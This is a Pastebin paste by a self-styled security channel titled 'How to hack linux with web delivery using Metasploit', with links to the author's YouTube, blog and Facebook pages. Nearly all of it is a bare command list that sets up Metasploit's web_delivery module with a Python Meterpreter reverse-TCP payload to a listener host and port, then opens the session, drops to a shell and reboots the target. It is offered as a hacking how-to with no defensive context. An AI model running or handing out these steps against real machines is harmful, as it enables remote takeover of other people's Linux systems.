Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##################################################JokerSecurity######################################################### # Title : How to hack linux with web delivery using Metasploit
- # Tested On : [ Kali-Linux ]
- # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
- # Myblog : http://kader-information.blogspot.com/
- # Link video : https://www.youtube.com/watch?v=qkpUIr5IXJY&feature=youtu.be
- ######################
- # [+] COMMENDS :
- ######################
- msfconsole
- use exploit/multi/script/web_delivery
- set LHOST 192.168.1.4
- set LPORT 4444
- set uripath /
- set target 0
- set payload python/meterpreter/reverse_tcp
- exploit
- sessions -i 1
- help
- sysinfo
- shell
- reboot
- subscribe for my channel and page in facebook
- # My Blogger : http://kader-information.blogspot.com/
- # Page FacebOOk : https://www.facebook.com/AnonymousPalestine.vip
- By <3 ##################################################JokerSecurity#########################################################
Add Comment
Please, Sign In to add comment